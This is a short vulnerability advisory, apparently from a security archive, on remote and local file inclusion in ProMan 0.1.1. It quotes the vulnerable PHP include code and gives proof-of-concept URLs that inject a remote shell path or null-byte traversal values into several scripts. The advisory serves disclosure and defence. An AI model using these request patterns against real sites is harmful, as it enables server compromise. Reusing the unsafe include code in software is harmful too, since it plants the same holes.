ProMan 0.1.1 local file inclusion and remote file inclusion

2010-03-01 / 2010-03-02
Credit: cr4wl3r
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-2137 | CVE-2010-2138
CWE: CWE-94
CWE-22

############################################################## ##ProMan <= 0.1.1 Multiple File Include Vulnerability ############################################################## Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg> Download: http://sourceforge.net/projects/pman/files/ ############################################################## [RFI Code] <?php if (!($_GET['page'])) include('info.php'); else include $_GET['page'].'.php'; ?> [LFI Code] include_once('lang/'.$_SESSION['userLang'].'/elisttasks.php'); if (!defined('PROMAN')) pexit ($l['no hack']); ############################################################## PoC RFI: [phpRAINCHECK_path]/_center.php?page=[Shell] ############################################################## PoC LFI: [phpRAINCHECK_path]/elisttasks.php?_SESSION[userLang]=[LFI%00] [phpRAINCHECK_path]/managepmanagers.php?_SESSION[userLang]=[LFI%00] [phpRAINCHECK_path]/manageusers.php?_SESSION[userLang]=[LFI%00] [phpRAINCHECK_path]/helpfunc.php?_SESSION[userLang]=[LFI%00] [phpRAINCHECK_path]/managegroups.php?_SESSION[userLang]=[LFI%00] [phpRAINCHECK_path]/manageprocess.php?_SESSION[userLang]=[LFI%00] [phpRAINCHECK_path]/manageusersgroups.php?_SESSION[userLang]=[LFI%00] others... ##############################################################

References:

http://xforce.iss.net/xforce/xfdb/56577
http://www.exploit-db.com/exploits/11587
http://packetstormsecurity.org/1002-exploits/proman-rfilfi.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top